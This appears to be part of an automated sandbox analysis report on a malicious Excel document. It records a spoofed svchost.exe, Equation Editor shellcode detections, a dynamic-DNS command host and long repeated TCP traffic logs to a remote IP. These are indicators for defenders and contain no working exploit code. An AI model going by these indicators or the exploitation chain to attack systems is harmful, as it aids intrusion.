Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	7_2_0040BB30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	7_2_0040BD37
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	7_2_100010F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_10006580 FindFirstFileExA,	7_2_10006580

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 7_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

7_2_00407C97

Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\	Jump to behavior

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03560659 LoadLibraryW,	2_2_03560659
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0356084B CreateProcessW,ExitProcess,	2_2_0356084B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035606B9 WriteFile,	2_2_035606B9
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03560622 CreateFileW,	2_2_03560622
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03560721 WriteFile,	2_2_03560721
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035607AC WriteFile,CreateProcessW,ExitProcess,	2_2_035607AC
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035605D6 CreateFileW,	2_2_035605D6
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03560752 WriteFile,	2_2_03560752
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0356057A ExitProcess,CreateFileW,	2_2_0356057A
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0356076E WriteFile,CreateProcessW,ExitProcess,	2_2_0356076E
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03560792 WriteFile,CreateProcessW,ExitProcess,	2_2_03560792
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03560593 CreateFileW,	2_2_03560593
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03560887 ExitProcess,	2_2_03560887
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03560705 WriteFile,	2_2_03560705
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0356060F CreateFileW,	2_2_0356060F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0356080D CreateProcessW,ExitProcess,	2_2_0356080D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_035605AF CreateFileW,	2_2_035605AF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0356082A CreateProcessW,ExitProcess,	2_2_0356082A

Source: global traffic	DNS query: name: yuahdgbceja.sytes.net
Source: global traffic	DNS query: name: geoplugin.net

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 178.237.33.50:80

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 23.94.54.101:80
Source: global traffic	TCP traffic: 23.94.54.101:80 -> 192.168.2.22:49161
